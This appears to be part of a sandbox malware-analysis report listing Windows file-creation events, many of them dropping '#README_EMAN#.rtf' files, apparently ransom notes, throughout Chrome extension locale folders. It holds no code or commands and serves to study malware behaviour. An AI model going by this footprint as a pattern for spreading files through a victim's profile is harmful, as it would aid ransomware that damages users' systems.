| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\zh_TW\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_metadata\verified_contents.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\az\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\128.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\sk\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\pt_BR\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\hu\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\it\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\nl\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\index | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\en\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\master_preferences | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\es\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\pl\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\pt_PT\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\bg\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\sv\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\tr\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\vi\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\zh_TW\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ar\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ca\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\el\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\en_US\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\es_419\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\fi\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\hi\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\id\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ja\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\lt\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\no\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\browser\features\firefox@getpocket.com.xpi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\pt_BR\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ro\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\sk\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\uk\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\zh_CN\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_metadata\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\es_419\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\de\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\uk\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_metadata\computed_hashes.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\it\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\it\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\es\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hi\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\fr\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\lv\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sl\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\128.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\km\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\gu\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\pt_PT\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\cs\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\cs\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ro\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ca\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\ka\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\el\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\eu\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\he\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ja\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ms\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ro\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\sr\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\zh_CN\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\de\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\fi\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\hu\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\ko\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\pt_BR\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\sk\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\uk\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_metadata\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\ar\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\es_419\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\ja\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\ro\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\zh_CN\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\af\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\el\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ne\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sl\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\fonts\EmojiOneMozilla.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\es\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\ms\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\fil\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\zh_CN\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\lv\messages.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
